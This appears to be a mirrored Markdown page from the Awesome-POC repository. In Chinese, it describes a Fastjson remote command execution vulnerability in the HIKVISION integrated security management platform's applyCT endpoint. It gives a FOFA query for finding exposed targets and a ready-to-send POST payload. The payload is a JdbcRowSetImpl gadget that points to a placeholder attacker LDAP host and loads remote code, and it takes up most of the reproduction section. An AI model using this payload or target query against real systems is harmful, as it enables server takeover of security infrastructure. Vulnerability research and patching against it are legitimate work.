admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 04:18:39 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞.md

34 lines
820 B
Markdown
Raw Normal View History

更新漏洞库:网络设备漏洞/
2022-08-24 14:34:12 +08:00
# HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
## 漏洞描述
HIKVISION 综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞攻击者通过漏洞可以执行任意命令获取服务器权限
## 漏洞影响
```
HIKVISION 综合安防管理平台
```
## FOFA
```
app="HIKVISION-综合安防管理平台"
```
## 漏洞复现
登录页面
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220824134144287](./images/202208241341481.png)
更新漏洞库:网络设备漏洞/
2022-08-24 14:34:12 +08:00
验证POC
```
POST /bic/ssoService/v1/applyCT
Content-Type: application/json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
```
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220824134503675](./images/202208241345726.png)
Reference in New Issue Copy Permalink